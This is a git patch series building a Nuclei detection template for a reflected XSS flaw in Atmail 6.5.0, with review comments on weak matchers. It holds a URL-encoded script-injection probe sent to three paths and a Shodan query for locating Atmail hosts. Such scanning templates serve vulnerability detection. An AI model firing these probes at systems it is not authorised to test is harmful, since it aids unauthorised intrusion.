From 3f072e5f2e9c759d51aba1bf8f0dee718dda0dec Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Thu, 1 Sep 2022 11:46:54 +0530
Subject: [PATCH 1/3] Create CVE-2021-43574.yaml
---
cves/2021/CVE-2021-43574.yaml | 31 +++++++++++++++++++++++++++++++
1 file changed, 31 insertions(+)
create mode 100644 cves/2021/CVE-2021-43574.yaml
diff --git a/cves/2021/CVE-2021-43574.yaml b/cves/2021/CVE-2021-43574.yaml
new file mode 100644
index 0000000000..ff24496a8a
--- /dev/null
+++ b/cves/2021/CVE-2021-43574.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-43574
+
+info:
+ name: Atmail Hosting Webserver 6.5.0 - Reflected Cross-site scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ Cross-site scripting (XSS) vulnerability in sites using outdated Atmail hosting version 6.5.0 allows remote attackers to inject arbitrary web script or HTML via the “format” parameter
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43574
+ - https://medium.com/@bhattronit96/cve-2021-43574-696041dcab9e
+ metadata:
+ shodan-query: http.html:"Powered by Atmail"
+ verified: true
+ tags: xss,cve,2021
+
+requests:
+ - raw:
+ - |
+ GET /atmail/?format="> HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 500
+
+ - type: word
+ words:
+ - ''
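Review bot: The second matcher (`words: - ''`) matches every response, so with `matchers-condition: and` the template effectively fires on any HTTP 500 from `/atmail/?format=">`, which is evidence of an error path, not of the injected markup being reflected unescaped. A reflected-XSS template needs at least one body matcher for the reflected payload, for example `part: body` with `words: - '">'` (or the full decoded probe) alongside the status check; the same weakness survives into patch 3 of this series, where the body matcher checks only the error-message fragment. Dropping the empty-string matcher entirely is clearer than keeping a placeholder that always succeeds.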
From fe8ce97ceb18ab46d5dc6c3853399d007ff24585 Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Thu, 1 Sep 2022 11:54:02 +0530
Subject: [PATCH 2/3] Update CVE-2021-43574.yaml
---
cves/2021/CVE-2021-43574.yaml | 8 ++++++++
1 file changed, 8 insertions(+)
diff --git a/cves/2021/CVE-2021-43574.yaml b/cves/2021/CVE-2021-43574.yaml
index ff24496a8a..746617c5d9 100644
--- a/cves/2021/CVE-2021-43574.yaml
+++ b/cves/2021/CVE-2021-43574.yaml
@@ -19,6 +19,14 @@ requests:
- |
GET /atmail/?format="> HTTP/1.1
Host: {{Hostname}}
+
+ - |
+ GET /atmail/webmail/?format="> HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /?format="> HTTP/1.1
+ Host: {{Hostname}}
matchers-condition: and
matchers:
From 99702fea47d023f266bc8bf574f7db8e944de0ab Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 1 Sep 2022 12:04:48 +0530
Subject: [PATCH 3/3] Update CVE-2021-43574.yaml
---
cves/2021/CVE-2021-43574.yaml | 46 +++++++++++++++++++----------------
1 file changed, 25 insertions(+), 21 deletions(-)
diff --git a/cves/2021/CVE-2021-43574.yaml b/cves/2021/CVE-2021-43574.yaml
index 746617c5d9..e6fcbe06b9 100644
--- a/cves/2021/CVE-2021-43574.yaml
+++ b/cves/2021/CVE-2021-43574.yaml
@@ -1,39 +1,43 @@
id: CVE-2021-43574
info:
- name: Atmail Hosting Webserver 6.5.0 - Reflected Cross-site scripting
- author: arafatansari
+ name: Atmail Hosting Webserver 6.5.0 - Cross-site scripting
+ author: arafatansari,ritikchaddha
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in sites using outdated Atmail hosting version 6.5.0 allows remote attackers to inject arbitrary web script or HTML via the “format” parameter
reference:
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43574
- https://medium.com/@bhattronit96/cve-2021-43574-696041dcab9e
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-43574
+ classification:
+ cve-id: CVE-2021-43574
metadata:
- shodan-query: http.html:"Powered by Atmail"
verified: true
- tags: xss,cve,2021
+ shodan-query: http.html:"Powered by Atmail"
+ tags: cve,cve2021,atmail,xss
requests:
- - raw:
- - |
- GET /atmail/?format="> HTTP/1.1
- Host: {{Hostname}}
-
- - |
- GET /atmail/webmail/?format="> HTTP/1.1
- Host: {{Hostname}}
-
- - |
- GET /?format="> HTTP/1.1
- Host: {{Hostname}}
+ - method: GET
+ path:
+ - "{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+ - "{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+ - "{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+ stop-at-first-match: true
matchers-condition: and
matchers:
+ - type: word
+ part: body
+ words:
+ - '" does not exist'
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
- type: status
status:
- 500
-
- - type: word
- words:
- - ''
+ - 403
+ condition: or
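Review bot: The body matcher `'" does not exist'` only confirms that the server rejected the `format` value; it does not verify that the markup is reflected unescaped, so a build that HTML-encodes the error message would still be flagged, while the `text/html` header check does not tighten this either. Add a body matcher for the reflected probe, e.g. `- '<script>alert(document.domain)</script>'` (the decoded form of the payload already used in `path`), so the `and` condition actually proves reflection. Matching 403 as an acceptable status also seems inconsistent with a reflected error page; if 403 responses were observed with the reflected payload that is worth a one-line comment above the status matcher, otherwise restrict it to 500. As far as I recall, nuclei's `status` matcher already accepts any listed code, so `condition: or` is redundant; harmless, but confirm against the engine version in use.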